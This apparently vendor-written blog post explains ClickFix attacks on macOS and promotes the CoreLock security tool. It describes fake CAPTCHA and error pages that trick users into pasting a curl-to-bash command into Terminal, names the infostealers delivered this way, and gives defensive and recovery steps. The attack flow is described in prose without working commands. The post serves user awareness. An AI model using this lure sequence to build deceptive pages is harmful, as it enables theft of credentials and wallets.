What Is a ClickFix Attack? The Mac Threat You Haven't Heard Of

You are browsing the web. A popup appears telling you something is wrong with your browser. There is a "Fix" button. You click it. It copies a command to your clipboard and tells you to paste it into Terminal. You follow the instructions because the page looks legitimate and you just want the problem to go away.

You have just installed malware on your Mac. And your Mac's built-in security did nothing to stop it, because you told it to let the malware in.

This is called ClickFix, and it is one of the fastest-growing threats targeting Mac users in 2026. I have been tracking it closely because it represents a fundamental shift in how attackers go after macOS. They stopped trying to break through Apple's defenses. They trick you into opening the door yourself.

What is ClickFix?

ClickFix is a social engineering technique where attackers create fake error messages, CAPTCHA pages, or system warnings that instruct you to copy and paste a malicious command into your Mac's Terminal app. The name comes from the premise: click this button, and it will "fix" your problem.

The technique was first observed in early 2024 targeting Windows users. By mid-2025, researchers at Microsoft and Proofpoint documented ClickFix campaigns adapted for macOS. Since late 2025, it has exploded. Microsoft reported a significant surge in macOS-targeted infostealer campaigns using ClickFix-style prompts, and new variants like "CrashFix" and "Matryoshka ClickFix" have emerged with even more convincing social engineering.

This is not theoretical. It is active, evolving, and targeting Mac users right now.

How a ClickFix attack works, step by step

Here is exactly what happens during a typical ClickFix attack on macOS.

Step 1: You land on a malicious page

You encounter a fake page through a Google ad, a compromised website, or a phishing email. Common disguises include fake Cloudflare "Verify You Are Human" CAPTCHA pages, browser error messages claiming Chrome or Safari needs an update, and system alerts warning about a missing driver.

Step 2: You click the button

The page has a prominent button labeled "Verify," "Fix," or "Continue." When you click it, a malicious command is silently copied to your clipboard. You never see what was copied.

Step 3: You follow the instructions

The page shows step-by-step instructions tailored for macOS: press Command + Space to open Spotlight, type "Terminal," press Command + V to paste, and hit Enter. Some variants show animated GIFs walking you through the process.

Step 4: The command executes

The pasted command uses curl in silent mode to download a script from an attacker-controlled server, pipes it to bash for immediate execution, and uses nohup to keep running even if you close Terminal. In seconds, malware is installed and running.

Step 5: Your data is stolen

The malware immediately begins harvesting your data. Within minutes, passwords, cookies, crypto wallets, and personal files are being uploaded to the attacker's servers.

Why ClickFix is devastatingly effective on Mac

This is the part that concerns me most. ClickFix does not exploit a software vulnerability. It exploits trust. And that means your Mac's built-in protections are almost entirely useless against it.

Gatekeeper cannot help. Gatekeeper checks applications when you download and open them. ClickFix does not ask you to download an app. It asks you to paste a command into Terminal, an app that Apple already trusts. Gatekeeper never intervenes.

XProtect may not catch it. XProtect scans for known malware signatures. But the initial command is just a curl download. The payload can change constantly, and new variants may not have signatures yet.

Notarization is irrelevant. Apple's notarization system checks that apps are signed before they run. Terminal commands bypass this entirely. You are running a shell command, and macOS lets you because it assumes you know what you are doing.

The user is the attack vector. Every technical control on your Mac is designed to protect you from malicious software. ClickFix turns you into the one who installs it.

This is why security is not just about scanning for known threats. It is about understanding what is happening on your machine and flagging when something looks wrong, even if the user authorized it.

What gets installed

The malware delivered through ClickFix attacks is almost always an infostealer. Here are the families we are seeing most often in 2026.

Atomic macOS Stealer (AMOS)

AMOS is the most common payload in Mac-targeted ClickFix campaigns. Once running, it extracts Keychain passwords, browser cookies and saved credentials from Chrome, Firefox, and Safari, cryptocurrency wallet data from Electrum, Exodus, and Coinomi, files from your Desktop and Documents folders, and your macOS user password through a fake system dialog. AMOS is sold as malware-as-a-service, meaning anyone can buy and run campaigns. That is why it is so widespread. If you want to understand the signs your Mac might be compromised, this is exactly the kind of threat to watch for.

MacSync

MacSync is a newer infostealer that initially relied on ClickFix-style Terminal tricks but has evolved into code-signed Swift applications distributed through typosquatted domains. It targets similar data as AMOS but uses different exfiltration methods.

DigitStealer and others

Microsoft documented additional stealer families including DigitStealer being distributed alongside AMOS and MacSync through ClickFix campaigns. The stealer ecosystem on macOS is growing fast.

All of these stealers typically install persistence mechanisms using LaunchAgents, meaning they survive reboots and continue running in the background. Understanding what hidden processes look like on your Mac is critical for spotting this kind of persistence.

The latest evolution: CrashFix

In February 2026, Microsoft published research on a particularly nasty ClickFix variant called CrashFix. Here is how it works.

An attacker distributes a malicious browser extension masquerading as a legitimate ad blocker. The extension works normally for a while. Then it intentionally crashes the browser and displays a fake "CrashFix" warning. Because the browser actually did crash, the victim believes the error is real.

The fake warning walks the user through the standard ClickFix flow: copy a command and paste it into Terminal to "restore" the browser. A real crash combined with a fake fix makes this variant significantly more convincing.

How to protect yourself

The good news is that once you know what ClickFix looks like, it loses almost all of its power. Here is what to do.

Never paste commands from websites into Terminal

This is the single most important rule. No legitimate website will ever ask you to open Terminal and paste a command to fix your browser, verify your identity, complete a CAPTCHA, or update your system. If a website asks you to do this, it is an attack. Close the tab.

Treat "fix" buttons with extreme suspicion

If a popup claims something is wrong with your Mac and offers a quick fix, assume it is malicious. Real system errors do not appear in your browser. Real CAPTCHAs never require Terminal. Real updates come through System Settings or the App Store.

Only run Terminal commands from trusted sources

If you use Terminal, only run commands from official documentation or developers you trust. Read the command before running it. If you cannot explain what every part does, do not run it.

Audit your browser extensions

Given the CrashFix variant, regularly review your browser extensions. Remove any you do not actively use. Only install extensions from official stores, and check reviews and developer reputation. For a full walkthrough, check out our comprehensive Mac security guide.

Monitor for anomalous processes and connections

If you suspect you encountered a ClickFix attempt, check what is running on your Mac. CoreLock is built for exactly this. It monitors running processes and network connections, flagging the kind of shell-spawned processes and outbound connections that ClickFix payloads create. You do not need to know what curl piped to bash looks like in a process list. CoreLock knows, and it will tell you.

If you think you fell for it

If you pasted a command from a website into Terminal and now you are worried, here is what to do immediately.

Disconnect from the internet. Turn off Wi-Fi and unplug Ethernet. This stops any ongoing data exfiltration.

Check for unknown processes. Open Activity Monitor (Applications > Utilities > Activity Monitor) and look for processes you do not recognize, especially anything consuming network resources.

Check your LaunchAgents folders. These are the most common persistence locations for Mac malware. Open Terminal (yes, Terminal is still safe to use when you know what you are typing) and run:

ls ~/Library/LaunchAgents/
ls /Library/LaunchAgents/
ls /Library/LaunchDaemons/

Look for anything you do not recognize. Legitimate entries are usually from Apple or known software vendors.

Change your passwords from a different device. Do not change passwords on the potentially compromised Mac. Use your phone or another computer. Prioritize your email, bank accounts, and any cryptocurrency accounts.

Run a full scan. Use CoreLock to scan every running process, check for persistence mechanisms, and identify any anomalous network connections. It will give you a clear picture of whether something malicious is running and what it is doing. You can download CoreLock for free and scan in under a minute.

For a detailed walkthrough on cleaning up after an infection, read our guide on how to remove malware from your Mac.

The bigger picture

ClickFix represents a broader shift in the macOS threat landscape. Attackers have learned that breaking through Apple's technical defenses is hard. Tricking users into bypassing those defenses themselves is easy. We are going to see more of this, not less.

The Mac community spent years believing that Macs do not get malware. That was never entirely true, but it was true enough that most Mac users never developed the healthy paranoia that Windows users have. ClickFix exploits that complacency directly.

I built CoreLock because Mac security needs to go beyond signature-based scanning. It needs to understand behavior. When a shell command spawns a process that immediately starts making encrypted connections to an unfamiliar server, that should raise a flag, regardless of whether it matches a known signature. That behavioral awareness is what separates catching a ClickFix payload from missing it entirely.

Stay skeptical. If a website tells you to paste something into Terminal, close it. Your browser does not need fixing. Your Mac does not need a command-line CAPTCHA. No legitimate service will ever ask you to open Terminal to verify that you are human.

Want to know what is actually running on your Mac right now? Download CoreLock for free and scan your system in under a minute. No Terminal commands required.